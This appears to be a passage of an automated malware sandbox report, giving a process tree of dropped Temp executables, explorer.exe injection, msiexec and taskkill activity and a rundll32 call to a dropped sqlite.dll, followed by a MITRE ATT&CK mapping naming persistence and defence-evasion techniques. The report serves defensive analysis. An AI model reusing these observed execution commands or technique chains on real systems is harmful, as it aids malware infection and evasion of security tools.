C:\Users\Admin\AppData\Local\Temp\38EE.exeC:\Users\Admin\AppData\Local\Temp\38EE.exe1⤵
- Loads dropped DLL
PID:5592
-
C:\Users\Admin\AppData\Local\Temp\3B9F.exeC:\Users\Admin\AppData\Local\Temp\3B9F.exe1⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\414D.exeC:\Users\Admin\AppData\Local\Temp\414D.exe1⤵PID:5056
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4024
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3780
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5156
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5640
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:636
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5188
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1328
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5924
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5392
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:764
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5680
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4480
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
PID:4532 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BB5D0D8670433D74C6E4F011578CD9C9 C2⤵
- Loads dropped DLL
PID:6068
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1785F37C2F61654F88590ECCE6397A442⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7144 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6864
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 09464F5E817D580AA9872822AB0895F3 E Global\MSI00002⤵
- Loads dropped DLL
PID:6864
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6916
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7020 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7036
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵PID:6464
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7032
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6152
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6216
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6340
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6784
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5532
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5208
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Defense Evasion
BITS Jobs
1Bypass User Account Control
1Disabling Security Tools
2Install Root Certificate
1Modify Registry
6Web Service
1